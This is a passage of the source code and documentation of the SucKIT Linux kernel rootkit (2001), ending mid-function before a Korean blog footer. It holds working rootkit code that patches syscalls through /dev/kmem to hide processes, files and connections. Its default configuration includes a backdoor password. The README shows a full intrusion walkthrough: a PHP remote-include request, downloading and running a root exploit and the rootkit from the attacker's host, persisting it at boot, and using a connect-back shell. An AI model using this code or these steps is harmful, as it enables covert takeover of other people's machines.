FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(ss, &fds);
if (winsize) {
if (ioctl(0, TIOCGWINSZ, &ws) == 0) {
buf[0] = ECHAR;
buf[1] = (ws.ws_col >> 8) & 0xFF;
buf[2] = ws.ws_col & 0xFF;
buf[3] = (ws.ws_row >> 8) & 0xFF;
buf[4] = ws.ws_row & 0xFF;
write(ss, buf, 5);
}
winsize = 0;
}
if (select(ss+1, &fds, NULL, NULL, NULL) < 0) {
if (errno == EINTR) continue;
break;
}
if (winsize) continue;
if (FD_ISSET(0, &fds)) {
int count = read(0, buf, BUF);
// int i;
if (count <= 0) break;
if (memchr(buf, ECHAR, count)) {
printf("Interrupted!\n");
break;
}
if (write(ss, buf, count) <= 0) break;
}
if (FD_ISSET(ss, &fds)) {
int count = read(ss, buf, BUF);
if (count <= 0) break;
if (write(0, buf, count) <= 0) break;
}
}
close(sock);
tcsetattr(0, TCSAFLUSH, &old);
printf("\nConnection closed.\n");
return 0;
}
<--> ./client/client.c
<++> ./doc/LICENSE
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit *
* (c)oded by sd@sf.cz & devik@cdi.cz, 2001 *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
<--> ./doc/LICENSE
<++> ./doc/CHANGES
Development history:
Version 1.1c:
- disabled flow control in client, escape char changed to ^K
Version 1.1b:
- fixed GFP_KERNEL bug with segfaulting on 2.4.0 - 2.4.5 kernels
Version 1.1a:
- makefile, added SIGWINCH support + autentification of remote
user (but still in plain text ;( )
Version 1.0d:
- added connect-back bindshell, with TTY/PTY support !
filtering out invisible pids, connections and philes ;)
Version 1.0c:
- only one thing we're doing at this time, is to change one letter
in output of uname()
Version 1.0b:
- first working version of new code, relocations made directly
from .o, as far i know, everything works on 2.4.x smoothly,
just add some good old features...
Added (read: stolen) linus' string.c and vsprintf.c in order to
make coding more user-phriendly ;)
Version 1.0a:
- devik@cdi.cz discovered that `sidt` works on linux ... so we can
play a bit with int 0x80 ;)) kmalloc search engine was written by
devik too, many thanks to him!
---------------------------------------------------------------------------
Version 0.3d:
- I got 2.4.10 kernel and things are _totally_ fucked up,
nothing didn't work, kmalloc search engine was gone and so on ..
So i decided to rewrite code from scratch,
divide it to more files.
Version 0.3c: (PUBLIC)
- added getdents64 (interesting for 2.4.x kernel, but compatibility
still not guaranted)
Version 0.3b:
- added `scp` sniffing
- no sniffing of hidden users anymore!
Version 0.3: (PUBLIC)
- Punk. Fool. We don't need LKM support anymore !!!
We're able to heuristically abtain (with 80% accuracy ;)
sys_call_table[] and kmalloc() directly from /dev/kmem !!!
third release under GNU/GPL
Version 0.23a:
- completely rewritten new_getdents(), fixed major bugs,
but still sometimes crashes unpredictabely ;-(
Version 0.22b:
- rcscript is executed as invisible by nature ;)
Version 0.22a:
- Fixed "unhide all" bug, feature works now
Version 0.21a:
- added ssh2d support
Version 0.2a:
- fixed ugly bug in that suckit forgets to hide some invisible
pids (on high loads) without reason !!
(thx. to root@buggy.frogspace.net ;)
Version 0.2: (PUBLIC)
- Cleanup (the suckit.h thing, etc),
l33t bash skripts (flares, mk, inst),
second (BUGFIX) release under GNU/GPL
Version 0.13a:
- Filters out the syslogd's lines of us while we logginin' in/out,
WE'RE TOTALLY INVISIBLE NOW!
Version 0.12a:
- Finally! We're able to hide our TCP/UDP/RAW sockets in netstat!
Everything done usin' stealth techniqe for /proc/net/tcp|udp|raw
Version 0.11b:
- We hide the fact that someone sets PROMISC flag on some eth iface
(thru ioctl)
Version 0.11a:
- Fixed the weird bug in check_names() so we're able to stay in
kernel for more than 2 hours without consuming a lotta of memory
and rebooting (thx. to root@host2.dns4ua.com)
Version 0.1: (PUBLIC):
- General code cleanup, released first version under GNU/GPL
Version 0.08a:
- Added suid=0 fakeshell thing, because some hosts don't like uid=0
users remotely logged in ;)
Version 0.07c:
- Fixed bug with kernel's symbol versions (strncmp ownz! ;) while
we importin' symbols
Version 0.07b:
- Added the `config` crap ;)
Version 0.07a:
- Everything joined into one executable ;)
Compilation divided into three parts:
.C -> .S, .S -> our_parses -> .s, .s -> binary
Version 0.06a:
- Fixed major bugs with small buffers, added PID hidding and our
PID tracking system, leaved from using 'task_struct *current'
and other kernel structures, so the code can work on any kernel
of 2.2.x without recompilation !
Version 0.05a:
- solved our problem with 'who', we forbid any write to
utmp/wtmp/lastlog containing our username ;)
Version 0.04a:
- "backdoor" over fake /etc/passwd for remote services
(telnet, rsh, ssh), but we are still visible in `who` ;(
Version 0.03a:
- First relocatable code, we still do only one thing
(hiding files), divided into two parts object module
(normal, vanilla kernel-LKM ;) and Silvio's kinsmod
(which places it to kernel space thru /dev/kmem)
Version 0.02b:
- Finally! We're able to allocate kernel memory thru kmalloc() !
But the code does nothing ;(
Version 0.02a:
- First executable code, we're overwriting kernel-code at static
address.
Fixed one major bug:
[rewt@pikatchu ~]# ./suckit
bash: ./suckit: No such file or directory
Version 0.01a:
- uhm, no real code, just only concept in my head
<--> ./doc/CHANGES
<++> ./doc/README
suc-kit - Super User Control Kit, (c)ode by sd@sf.cz & devik@cdi.cz, 2001
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Works on: 2.2.x, 2.4.x linux kernels (2.0.x should too, but not tested)
SucKIT
~~~~~~
- Code by sd <sd@sf.cz>, sd@ircnet
- kmalloc() & idt/int 0x80 crap by devik <devik@cdi.cz>
- Thanks to:
Silvio Cesare for his excellent articles
halflife (for opening my eyes to look around LKM's)
QuantumG for example in STAOG
Description
~~~~~~~~~~~
Suckit (stands for stupid 'super user control kit') is another of
thousands linux rootkits, but it's unique in some ways:
Features:
- Full password protected remote access connect-back shell
initiated by spoofed packet (bypassing most of firewall
configurations)
- Full tty/pty, remote enviroment export + setting up win size
while client gets SIGWINCH
- It can work totally alone (without libs, gcc ...) using only
syscalls (this applies only to server side, client is running
on your machine, so we can use libc ;)
- It can hide processes, files and connections
(f00led: fuser, lsof, netstat, ps & top)
- No changes in filesystem
Disadvantages:
- Non-portable, i386-linux specific
- Buggy as hell ;)
Instead of long explaining how to use it, small example is better:
An real example of complete attack (thru PHP bug):
[attacker@badass.cz ~/sk10]$ ./sk c
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit *
* (c)oded by sd@sf.cz & devik@cdi.cz, 2001 *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Usage:
./sk [command] [arg]
Commands:
u uninstall
t test
i <pid> make pid invisible
v <pid> make pid visible (0 = all)
f [0/1] toggle file hiding
p [0/1] toggle proc hiding
configuration:
c <hidestr> <password> <home>
invoking without args will install rewtkit into memory
[attacker@badass.cz ~/sk10]$ ./sk c l33t bublifuck /usr/share/man/man4/l33t
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit *
* (c)oded by sd@sf.cz & devik@cdi.cz, 2001 *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Configuring ./sk:
OK!
[attacker@badass.cz ~/sk10]$ telnet lamehost.com 80
Trying 192.160.0.2...
Connected to lamehost.com.
Escape character is '^]'.
GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1
Host: lamehost.com
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2001 04:04:52 GMT
Server: Apache/1.3.14 (Unix) (Red-Hat/Linux) PHP/4.0.4pl1
Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT
ETag: "31c6-c2-3bb3ffba"
Content-Type: text/html
IT WERKS! Shell at port 8193Connection closed by foreign host.
[attacker@badass.cz ~/sk10]$ nc -v lamehost.com 8193
lamehost.com [192.168.0.2] 8193 (?) open
w
12:08am up 1:20, 3 users, load average: 0.05, 0.06, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:58pm 39:03 3.15s 2.95s bash
cd /tmp
lynx -dump http://badass.cz/s.c > s.c
gcc s.c -o super-duper-hacker-user-rooter
./super-duper-hacker-user-rooter
id
uid=0(root) gid=0(root) groups=0(root)
cd /usr/local/man/man4
mkdir .l33t
cd .l33t
lynx -dump http://badass.cz/~attacker/sk10/sk > sk
chmod +s+u sk
./sk
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit *
* (c)oded by sd@sf.cz & devik@cdi.cz, 2001 *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Getting kernel stuff...OK
page_offset : 0xc0000000
sys_call_table[] : 0xc01e5920
int80h dispatch : 0xc0106cef
kmalloc() : 0xc0127a20
GFP_KERNEL : 0x000001f0
punk_addr : 0xc010b8e0
punk_size : 0x0000001c (28 bytes)
our kmem region : 0xc0f94000
size of our kmem : 0x00003af2 (15090 bytes)
new_call_table : 0xc0f968f2
# of relocs : 0x0000015d (349)
# of syscalls : 0x00000012 (18)
And nooooow....Shit happens!! -> WE'RE IN <-
Starting backdoor daemon...OK, pid = 2101
exit
exit
[attacker@badass.cz ~/sk10]$ su
Password:
[root@badass.cz ~/sk10]# ./cli lamehost.com
Looking up badass.cz...OK
Looking up lamehost.com...OK
Trying 192.168.0.2.....
Challenging lamehost.com
Connected to lamehost.com
Escape character is '^K'
Password:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit *
* (c)oded by sd@sf.cz & devik@cdi.cz, 2001 *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
[rewt@lamehost.com ~]# ps uwxa | grep ps
[rewt@lamehost.com ~]# cp sk /etc/rc.d/rc3.d/S99l33t
[rewt@lamehost.com ~]# exit
Connection closed.
[root@badass.cz ~/sk10]#
...and so on...
-- sd@sf.cz (sd@ircnet)
<--> ./doc/README
<++> ./doc/TODO
- some RSA for communication
- connection-less TCP for remote shell
- sniff everything & everywhere (tty's mostly ;)
- some kinda of spin-locking on SMPs
<--> ./doc/TODO
<++> ./include/suckit.h
/* $Id: suckit.h, core suckit defs */
#ifndef SUCKIT_H
#define SUCKIT_H
#ifndef __NR_getdents64
#define __NR_getdents64 220
#endif
#define OUR_SIGN OURSIGN
#define RC_FILE RCFILE
#define DEFAULT_HOME "/usr/share/man/.sd"
#define DEFAULT_HIDESTR "sk10"
#define DEFAULT_PASSWD "bublifuck"
/* cmd stuff */
#define CMD_TST 1 /* test */
#define CMD_INV 2 /* make pid invisible */
#define CMD_VIS 3 /* make pid visible */
#define CMD_RMV 4 /* remove from memory */
#define CMD_GFL 5 /* get flags */
#define CMD_SFL 6 /* set flags */
#define CMD_BDR 7
#define SYS_COUNT 256
#define CMD_FLAG_HP 1
#define CMD_FLAG_HF 2
/* crappy stuff */
#define BANNER \
"* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n" \
"* SUCKIT " SUCKIT_VERSION " - New, singing, dancing, world-smashing" \
" rewtkit *\n" \
"* (c)oded by sd@sf.cz & devik@cdi.cz, 2001 *\n" \
"* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n"
#define BAD1 "/proc/net/tcp"
#define BAD2 "/proc/net/udp"
#define BAD3 "/proc/net/raw"
/* kernel related stuff */
#define SYSCALL_INTERRUPT 0x80
#define KMEM_FILE "/dev/kmem"
#define MAX_SYMS 4096
#define MAX_PID 512
#define PUNK 109 /* victim syscall - old_uname */
/* for 2.4.x */
#define KMEM_FLAGS (0x20 + 0x10 + 0x40 + 0x80 + 0x100)
/* typedef's */
#define ulong unsigned long
#define uint unsigned int
#define ushort unsigned short
#define uchar unsigned char
struct kernel_sym {
ulong value;
uchar name[60];
};
struct new_call {
uint nr;
void *handler;
void **old_handler;
} __attribute__ ((packed));
/* this struct __MUST__ correspond with c0r3 header stuff in
utils/parse.c ! */
struct obj_struc {
ulong obj_len;
ulong bss_len;
void *punk;
uint *punk_size;
struct new_call *new_sct;
ulong *sys_call_table;
/* these values will be passed to image */
ulong page_offset;
ulong syscall_dispatch;
ulong *old_call_table;
} __attribute__ ((packed));
/* struct for communication between kernel <=> userspace */
struct cmd_struc {
ulong id;
ulong cmd;
ulong num;
char buf[1024];
} __attribute__ ((packed));
struct kma_struc {
ulong (*kmalloc) (uint, int);
int size;
int flags;
ulong mem;
} __attribute__ ((packed));
struct mmap_arg_struct {
unsigned long addr;
unsigned long len;
unsigned long prot;
unsigned long flags;
unsigned long fd;
unsigned long offset;
unsigned long lock;
};
struct de64 {
ulong long d_ino;
ulong long d_off;
unsigned short d_reclen;
uchar d_type;
uchar d_name[256];
};
struct de {
long d_ino;
uint d_off;
ushort d_reclen;
char d_name[256];
};
struct net_struc {
int fd;
int len;
int pos;
int data_len;
char dat[1];
};
struct pid_struc {
ushort pid;
struct net_struc *net;
uchar hidden;
} __attribute__ ((packed));
struct config_struc {
uchar magic[8];
uchar hs[32];
uchar pwd[32];
uchar home[64];
};
#define mmap_arg ((struct mmap_arg_struct *) \
(page_offset - sizeof(struct mmap_arg_struct)) )
#define MM_LOCK 0x1023AFAF
#define PAGE_SIZE 4096
#define PAGE_RW (PROT_READ | PROT_WRITE)
#ifndef O_RDONLY
#define O_RDONLY 0
#endif
#ifndef O_WRONLY
#define O_WRONLY 1
#endif
#ifndef O_RWDR
#define O_RDWR 2
#endif
/* debug stuff */
#ifdef SK_DEBUG
#define skd(fmt,args...) printf(fmt, args)
#else
#define skd(fmt,args...) while (0) {}
#endif
#endif
<--> ./include/suckit.h
<++> ./include/asm.h
/* $Id: asm.h, assembly related stuff */
#ifndef ASM_H
#define ASM_H
struct idtr {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed));
struct idt {
unsigned short off1;
unsigned short sel;
unsigned char none, flags;
unsigned short off2;
} __attribute__ ((packed));
#endif
<--> ./include/asm.h
<++> ./include/ip.h
/* $Id: ip.h, raw TCP/IP stuff */
struct rawdata {
ulong id;
ulong ip;
ushort port;
};
struct ippkt {
struct ip ip;
struct tcphdr tcp;
char something[12];
char data[1024];
};
struct pseudohdr {
u_int32_t saddr;
u_int32_t daddr;
u_int8_t zero;
u_int8_t protocol;
u_int16_t lenght;
};
u_short in_chksum(u_short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1)
{
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return((u_short) answer);
}
<--> ./include/ip.h
<++> ./include/str.h
/*
* linux/lib/string.c
*
* Copyright (C) 1991, 1992 Linus Torvalds
*/
#ifndef STRING_H
#define STRING_H
#ifndef NULL
#define NULL (void *) 0
#endif
extern char * ___strtok;
extern char * strpbrk(const char *,const char *);
extern char * strtok(char *,const char *);
extern char * strsep(char **,const char *);
extern unsigned strspn(const char *,const char *);
extern char * strcpy(char *,const char *);
extern char * strncpy(char *,const char *, unsigned);
extern char * strcat(char *, const char *);
extern char * strncat(char *, const char *, unsigned);
extern int strcmp(const char *,const char *);
extern int strncmp(const char *,const char *,unsigned);
extern int strnicmp(const char *, const char *, unsigned);
extern char * strchr(const char *,int);
extern char * strrchr(const char *,int);
extern char * strstr(const char *,const char *);
extern unsigned strlen(const char *);
extern unsigned strnlen(const char *,unsigned);
extern void * memset(void *,int,unsigned);
extern void * memcpy(void *,const void *,unsigned);
extern void * memmove(void *,const void *,unsigned);
extern void * memscan(void *,int,unsigned);
extern int memcmp(const void *,const void *,unsigned);
extern void * memchr(const void *,int,unsigned);
#endif
<--> ./include/str.h
<++> ./src/main.c
/* $Id: main.c, replacement of libc's main() parent */
#ifndef MAIN_C
#define MAIN_C
#include <stdarg.h>
#include <linux/unistd.h>
#define MAX_ARGS 255
/* uhh, nice replacement of libc ;) */
int _start(char *argv, ...)
{
char *arg_ptrs[MAX_ARGS];
char *p = argv;
int i = 0;
va_list ap;
va_start(ap, argv);
do {
arg_ptrs[i] = p;
p = va_arg(ap, char *);
i++;
if (i == MAX_ARGS) break;
} while (p);
_exit(main(i, arg_ptrs));
}
#endif
<--> ./src/main.c
<++> ./src/kernel.c
/* $Id: hook.c, kernel related stuff (read, write and so on) */
#ifndef KERNEL_C
#define KERNEL_C
/* stuff directly related with kernel */
#include "suckit.h"
#include "string.c"
#include "io.c"
/* simple inlines to r/w stuff from/to kernel memory */
/* read data from kmem */
static inline int rkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (read(fd, buf, size) != size) return 0;
return size;
}
/* write data to kmem */
static inline int wkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (write(fd, buf, size) != size) return 0;
return size;
}
/* read int from kmem */
static inline int rkml(int fd, int offset, ulong *buf)
{
return rkm(fd, offset, buf, sizeof(ulong));
}
/* write int to kmem */
static inline int wkml(int fd, int offset, ulong buf)
{
return wkm(fd, offset, &buf, sizeof(ulong));
}
/* relocate given image */
int img_reloc(void *img, ulong *reloc_tab, ulong reloc)
{
int count = 0;
/* relocate image */
while (*reloc_tab != 0xFFFFFFFF) {
skd("Relocating %x at %x",
* (ulong *) (((ulong) (img)) + *reloc_tab),
(((ulong) (img)) + *reloc_tab));
* (ulong *) (((ulong) (img)) + *reloc_tab) += reloc;
skd(" result=%x\n",
* (ulong *) (((ulong) (img)) + *reloc_tab));
reloc_tab++;
count++;
}
return count;
}
#endif
<--> ./src/kernel.c
<++> ./src/string.c
/* $Id: string.c, modified linus' vsprintf.c, thanx to him, whatever */
#ifndef STRING_C
#define STRING_C
#include "str.h"
char * ___strtok;
int strnicmp(const char *s1, const char *s2, unsigned len)
{
unsigned char c1, c2;
c1 = 0; c2 = 0;
if (len) {
do {
c1 = *s1; c2 = *s2;
s1++; s2++;
if (!c1)
break;
if (!c2)
break;
if (c1 == c2)
continue;
c1 &= c1 & 0xDF;
c2 &= c2 & 0xDF;
if (c1 != c2)
break;
} while (--len);
}
return (int)c1 - (int)c2;
}
inline char * strcpy(char * dest,const char *src)
{
char *tmp = dest;
while ((*dest++ = *src++) != '\0');
return tmp;
}
inline char * strncpy(char * dest,const char *src,unsigned count)
{
char *tmp = dest;
while (count-- && (*dest++ = *src++) != '\0');
return tmp;
}
inline char * strcat(char * dest, const char * src)
{
char *tmp = dest;
while (*dest)
dest++;
while ((*dest++ = *src++) != '\0');
return tmp;
}
inline char * strncat(char *dest, const char *src, unsigned count)
{
char *tmp = dest;
if (count) {
while (*dest)
dest++;
while ((*dest++ = *src++)) {
if (--count == 0) {
*dest = '\0';
break;
}
}
}
return tmp;
}
inline int strcmp(const char * cs,const char * ct)
{
register signed char __res;
while (1) {
if ((__res = *cs - *ct++) != 0 || !*cs++)
break;
}
return __res;
}
inline int strncmp(const char * cs,const char * ct,unsigned count)
{
register signed char __res = 0;
while (count) {
if ((__res = *cs - *ct++) != 0 || !*cs++)
break;
count--;
}
return __res;
}
char * strchr(const char * s, int c)
{
for(; *s != (char) c; ++s)
if (*s == '\0')
return NULL;
return (char *) s;
}
char * strrchr(const char * s, int c)
{
const char *p = s + strlen(s);
do {
if (*p == (char)c)
return (char *)p;
} while (--p >= s);
return NULL;
}
unsigned strlen(const char * s)
{
const char *sc;
for (sc = s; *sc != '\0'; ++sc)
/* nothing */;
return sc - s;
}
unsigned strnlen(const char * s, unsigned count)
{
const char *sc;
for (sc = s; count-- && *sc != '\0'; ++sc)
/* nothing */;
return sc - s;
}
unsigned strspn(const char *s, const char *accept)
{
const char *p;
const char *a;
unsigned count = 0;
for (p = s; *p != '\0'; ++p) {
for (a = accept; *a != '\0'; ++a) {
if (*p == *a)
break;
}
if (*a == '\0')
return count;
++count;
}
return count;
}
char * strpbrk(const char * cs, const char * ct)
{
const char *sc1,*sc2;
for( sc1 = cs; *sc1 != '\0'; ++sc1) {
for( sc2 = ct; *sc2 != '\0'; ++sc2) {
if (*sc1 == *sc2)
return (char *) sc1;
}
}
return NULL;
}
char * strtok(char * s,const char * ct)
{
char *sbegin, *send;
sbegin = s ? s : ___strtok;
if (!sbegin) {
return NULL;
}
sbegin += strspn(sbegin,ct);
if (*sbegin == '\0') {
___strtok = NULL;
return( NULL );
}
send = strpbrk( sbegin, ct);
if (send && *send != '\0')
*send++ = '\0';
___strtok = send;
return (sbegin);
}
char * strsep(char **s, const char *ct)
{
char *sbegin = *s, *end;
if (sbegin == NULL)
return NULL;
end = strpbrk(sbegin, ct);
if (end)
*end++ = '\0';
*s = end;
return sbegin;
}
inline void * memset(void * s,int c,unsigned count)
{
char *xs = (char *) s;
while (count--)
*xs++ = c;
return s;
}
inline void bzero(void *s, unsigned count)
{
memset(s, 0, count);
}
char * bcopy(const char * src, char * dest, int count)
{
char *tmp = dest;
while (count--)
*tmp++ = *src++;
return dest;
}
inline void * memcpy(void * dest,const void *src,unsigned count)
{
char *tmp = (char *) dest, *s = (char *) src;
while (count--)
*tmp++ = *s++;
return dest;
}
inline void * memmove(void * dest,const void *src,unsigned count)
{
char *tmp, *s;
if (dest <= src) {
tmp = (char *) dest;
s = (char *) src;
while (count--)
*tmp++ = *s++;
}
else {
tmp = (char *) dest + count;
s = (char *) src + count;
while (count--)
*--tmp = *--s;
}
return dest;
}
int memcmp(const void * cs,const void * ct,unsigned count)
{
const unsigned char *su1, *su2;
signed char res = 0;
for( su1 = cs, su2 = ct; 0 < count; ++su1, ++su2, count--)
if ((res = *su1 - *su2) != 0)
break;
return res;
}
void * memscan(void * addr, int c, unsigned size)
{
unsigned char * p = (unsigned char *) addr;
while (size) {
if (*p == c)
return (void *) p;
p++;
size--;
}
return (void *) p;
}
char * strstr(const char * s1,const char * s2)
{
int l1, l2;
l2 = strlen(s2);
if (!l2)
return (char *) s1;
l1 = strlen(s1);
while (l1 >= l2) {
l1--;
if (!memcmp(s1,s2,l2))
return (char *) s1;
s1++;
}
return NULL;
}
void * memmem(char *s1, int l1, char *s2, int l2)
{
if (!l2) return s1;
while (l1 >= l2) {
l1--;
if (!memcmp(s1,s2,l2))
return s1;
s1++;
}
return NULL;
}
void *memchr(const void *s, int c, unsigned n)
{
const unsigned char *p = s;
while (n-- != 0) {
if ((unsigned char)c == *p++) {
return (void *)(p-1);
}
}
return NULL;
}
#endif
<--> ./src/string.c
<++> ./src/core.c
/* $Id: core.c, mainly our syscalls */
#ifndef CORE_C
#define CORE_C
#include <stdarg.h>
#include <linux/unistd.h>
#include <asm/ptrace.h>
#include <asm/mman.h>
#include <asm/errno.h>
#include <asm/stat.h>
#include <linux/if.h>
#include "suckit.h"
#include "string.c"
#include "vsprintf.c"
#include "io.c"
/* ehrm, ,,exports'' ;)) */
extern ulong page_offset;
extern ulong syscall_dispatch;
extern ulong old_call_table;
/* set this to 1 if u wanna to debug something, don't forget
to change addr of printk (cat /proc/ksyms | grep printk) */
#if 0
int (*printk) (char *fmt, ...) = (void *) 0xc0113710;
#define crd(fmt,args...) printk(__FUNCTION__ "():" fmt "\n", args)
#else
#define crd(fmt,args...) while (0) {}
#endif
#define mmap_arg ((struct mmap_arg_struct *) \
(page_offset - sizeof(struct mmap_arg_struct)) )
/* new_XXX & old_XXX pair for some syscall */
#define ds(type,name,args...) type new_##name(args); \
type (*old_##name)(args)
/* only old_XXX def in order to import some syscall) */
#define is(type,name,args...) type (*old_##name)(args)
/* syscall defs */
ds(int, olduname, char *);
ds(int, fork, struct pt_regs);
ds(int, clone, struct pt_regs);
ds(int, open, char *, int, int);
ds(int, close, int);
ds(int, read, int, char *, uint);
ds(int, kill, int, int);
ds(int, getdents, uint, struct de *, int count);
ds(int, getdents64, uint, struct de64 *, int count);
ds(int, ioctl, uint, uint, ulong);
/* import various syscall to avoid using int 0x80 from syscall handlers */
is(int, stat, char *, struct stat *);
is(int, fstat, int, struct stat *);
is(void *, mmap, struct mmap_arg_struct *);
is(int, munmap, ulong, uint);
is(int, getpid, void);
is(int, readdir, uint, struct de *, uint);
is(int, readlink, char *, char *, uint);
is(int, lseek, int, int, int);
/* syscall replacement table (requiered by hook.c) */
#define repsc(x) {__NR_##x, (void *) new_##x, (void **) &old_##x},
#define impsc(x) {__NR_##x, (void *) NULL, (void **) &old_##x},
struct new_call new_sct[] = {
repsc(olduname)
repsc(fork)
repsc(clone)
repsc(open)
repsc(close)
repsc(read)
repsc(kill)
repsc(getdents)
repsc(getdents64)
repsc(ioctl)
impsc(stat)
impsc(fstat)
impsc(mmap)
impsc(munmap)
impsc(getpid)
impsc(readdir)
impsc(readlink)
impsc(lseek)
{0}
};
/* our fake sys_call_table[] ;) */
ulong sys_call_table[SYS_COUNT];
/* our table of hidden pid's */
struct pid_struc pid_tab[MAX_PID];
/* "bad" files ;) */
int bdev = -1, bad1 = -1, bad2 = -1, bad3 = -1;
/* our flags */
ulong our_flags = CMD_FLAG_HP | CMD_FLAG_HF;
int backdoor_pid = 0;
struct config_struc cfg = {"CFGMAGIC", ".sd", "", ""};
#define HIDE_FILES (our_flags & CMD_FLAG_HF)
#define HIDE_PROCS (our_flags & CMD_FLAG_HP)
/* replacement of olduname, allocates some memory in kernel space */
int punk(struct kma_struc *k)
{
k->mem = k->kmalloc(k->size, k->flags);
return 0;
}
/***************************** helper fn's ********************* */
uint my_atoi(char *n)
{
register uint ret = 0;
while ((((*n) < '0') || ((*n) > '9')) && (*n))
n++;
while ((*n) >= '0' && (*n) <= '9')
ret = ret * 10 + (*n++) - '0';
return ret;
}
/* u-alloc, 'u' stands for 'ugly' ;) */
void *ualloc(ulong size)
{
void *ret;
struct mmap_arg_struct msave;
while (mmap_arg->lock == MM_LOCK);
memcpy(&msave, mmap_arg, sizeof(struct mmap_arg_struct));
mmap_arg->lock = MM_LOCK;
mmap_arg->addr = 0;
mmap_arg->len = (PAGE_SIZE + size - 1) & ~PAGE_SIZE;
mmap_arg->prot = PAGE_RW;
mmap_arg->flags = MAP_PRIVATE | MAP_ANONYMOUS;
mmap_arg->fd = 0;
mmap_arg->offset = 0;
ret = old_mmap(mmap_arg);
memcpy(mmap_arg, &msave, sizeof(struct mmap_arg_struct));
if ((ulong) ret > 0xffff0000)
return NULL;
return ret;
}
static inline void ufree(void *ptr, ulong size)
{
if (ptr) {
old_munmap((ulong) ptr,
(PAGE_SIZE + size - 1) & ~PAGE_SIZE);
}
}
/* basic fn's */
static inline struct pid_struc *find_pid(int pid)
{
int i;
for (i = 0; i < MAX_PID; i++) {
if (pid_tab[i].pid == pid)
return &pid_tab[i];
}
return NULL;
}
struct pid_struc *add_pid(int pid)
{
struct pid_struc *p = find_pid(pid);
int i;
if (p) {
return p;
} else {
for (i = 0; i < MAX_PID; i++) {
if (!pid_tab[i].pid) {
bzero((char *) &pid_tab[i],
sizeof(struct pid_struc));
pid_tab[i].pid = pid;
return &pid_tab[i];
}
}
}
return NULL;
}
static inline struct pid_struc *hide_pid(int pid)
{
struct pid_struc *p = add_pid(pid);
if (p) {
p->hidden = 1;
}
crd("%d = 0x%x", pid, p);
return p;
}
struct pid_struc *del_pid(int pid)
{
struct pid_struc *p = find_pid(pid);
if (p) p->pid = 0;
return p;
}
int unhide_pid(int pid)
{
int i;
if (pid == 0) {
for (i = 0; i < MAX_PID; i++) {
del_pid(pid_tab[i].pid);
}
return 1;
}
return (del_pid(pid) != NULL);
}
void sync_pid_tab(void)
{
int i;
/* remove unused entries in order to avoid to become full */
for (i = 0; i < MAX_PID; i++) {
if ((pid_tab[i].pid) &&
(old_kill(pid_tab[i].pid, 0) == -ESRCH)) {
bzero((char *) &pid_tab[i],
sizeof(struct pid_struc));
}
}
}
static inline struct pid_struc *curr_pid(void)
{
return find_pid(old_getpid());
}
/* this creates table ("cache") of sockets owned by invisible processes */
int create_net_tab(int *tab, int max, struct de *de, char *buf)
{
int i;
int fd;
int cnt = 0;
crd("tab=0x%x, max=%d, de=0x%x, buf=0x%x", tab, max, de, buf);
for (i = 0; i < MAX_PID; i++) {
if (pid_tab[i].pid && pid_tab[i].hidden) {
char *zptr;
zptr = buf +
sprintf(buf, "/proc/%d/fd", pid_tab[i].pid);
crd("buf=%s (0x%x), zptr=0x%x", buf, buf, zptr);
수안이의 컴퓨터 연구실
Leave your greetings.